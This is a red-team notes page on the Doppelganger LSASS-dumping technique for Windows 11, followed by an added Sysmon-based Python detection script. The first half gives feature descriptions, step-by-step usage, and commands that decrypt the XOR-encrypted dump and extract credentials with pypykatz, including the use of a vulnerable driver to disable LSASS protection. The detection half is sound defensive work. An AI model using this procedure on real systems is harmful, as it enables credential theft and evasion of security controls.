# Doppelganger: Cloning and Dumping LSASS (Win11)

{% embed url="https://vari-sh.github.io/posts/doppelganger/#bonus-hollowreaper--advanced-process-hollowing" %}

* Dynamic API resolution with obfuscation
* SYSTEM token manipulation
* Process cloning with NtCreateProcessEx
* Direct memory access via RTCore64.sys to disable PPL
* XOR-encrypted dump written to disk, so the file does not match content-based scanning

1. **Doppelganger.exe** (execute)
2. **Put the driver into the Public folder:** RTCore64.sys
3. Execute **Doppelganger.exe**
4. Use the XOR Python script to decrypt the created dump: <https://github.com/vari-sh/RedTeamGrimoire/blob/main/Doppelganger/utils/decrypt_xor_dump.py>

   ```
   ┌──(kali㉿kali)-[~/Downloads]
   └─$ python xored.py doppelganger.dmp
   [+] Decryption successful. Output written to: doppelganger.dmp.dec
   ```
5. Use pypykatz to get the credentials

   ```
   ┌──(kali㉿kali)-[~/Downloads]
   └─$ pypykatz lsa minidump doppelganger.dmp.dec
   ```
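The feature list and the procedure above give a defender two host-level indicators that survive the tool's dump encryption: the known-vulnerable `RTCore64.sys` driver being loaded (here from the Public folder), and a handle to `lsass.exe` that carries `PROCESS_CREATE_PROCESS`, the access right a process clone via `NtCreateProcessEx` needs. The following is an added detection example, not code from the Doppelganger project or the linked post; it assumes a simplified Sysmon-style record shape (Event ID 6 DriverLoad with `ImageLoaded`, Event ID 10 ProcessAccess with `SourceImage`, `TargetImage`, `GrantedAccess`), and the sample events, the file paths and the allowlist are constructed for illustration.

```python
"""Added detection example for the Doppelganger technique (not the project's own code).

Scans simplified Sysmon-style events for two indicators that the XOR-encrypted
dump file cannot hide: a load of RTCore64.sys (especially from the Public folder)
and a non-allowlisted handle to lsass.exe, in particular one that includes
PROCESS_CREATE_PROCESS, which is what cloning lsass with NtCreateProcessEx needs.
"""
import ntpath

# Windows process access right required to use a process as the parent of a
# clone (NtCreateProcessEx / fork-style dumping).
PROCESS_CREATE_PROCESS = 0x0080

DRIVER_NAME = "rtcore64.sys"          # driver named on the page
PUBLIC_DIR = r"c:\users\public"       # drop location named on the page (lowercased)

# Constructed allowlist: processes that routinely open lsass.exe. Tune per environment.
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Constructed sample events in a simplified Sysmon-like shape.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},          # benign driver
    {"EventID": 6, "ImageLoaded": r"C:\Users\Public\RTCore64.sys"},                    # BYOVD driver from Public
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},       # allowlisted
    {"EventID": 10, "SourceImage": r"C:\Users\Public\Doppelganger.exe",                # constructed path
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},     # includes 0x80
]


def check_driver_load(ev):
    """Sysmon Event ID 6 (DriverLoad): flag RTCore64.sys and any driver loaded from the Public folder."""
    path = ev.get("ImageLoaded", "").lower()
    findings = []
    if ntpath.basename(path) == DRIVER_NAME:
        findings.append("known-vulnerable driver RTCore64.sys loaded")
    if path.startswith(PUBLIC_DIR + "\\"):
        findings.append("driver loaded from Public folder")
    return findings


def check_lsass_access(ev):
    """Sysmon Event ID 10 (ProcessAccess): flag non-allowlisted handles to lsass.exe,
    and call out PROCESS_CREATE_PROCESS, which a process clone requires."""
    target = ev.get("TargetImage", "").lower()
    source = ev.get("SourceImage", "").lower()
    if ntpath.basename(target) != "lsass.exe" or source in LSASS_ALLOWLIST:
        return []
    granted = int(ev.get("GrantedAccess", "0"), 16)   # Sysmon logs GrantedAccess as hex text
    findings = [f"{source} opened lsass.exe with GrantedAccess 0x{granted:x}"]
    if granted & PROCESS_CREATE_PROCESS:
        findings.append("PROCESS_CREATE_PROCESS on lsass.exe: possible process clone")
    return findings


def scan(events):
    """Return a list of (EventID, message) alerts for the supplied events."""
    alerts = []
    for ev in events:
        if ev.get("EventID") == 6:
            findings = check_driver_load(ev)
        elif ev.get("EventID") == 10:
            findings = check_lsass_access(ev)
        else:
            findings = []
        alerts.extend((ev["EventID"], msg) for msg in findings)
    return alerts


if __name__ == "__main__":
    for event_id, message in scan(SAMPLE_EVENTS):
        print(f"[EID {event_id}] {message}")
```

Because the dump on disk is XOR-encrypted, a file-content rule for minidump headers will not fire; key file-creation telemetry (Sysmon Event ID 11) on the writing process instead, and treat any driver load from a user-writable directory as a finding regardless of name, since the driver file can be renamed while the signature and behaviour stay the same.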
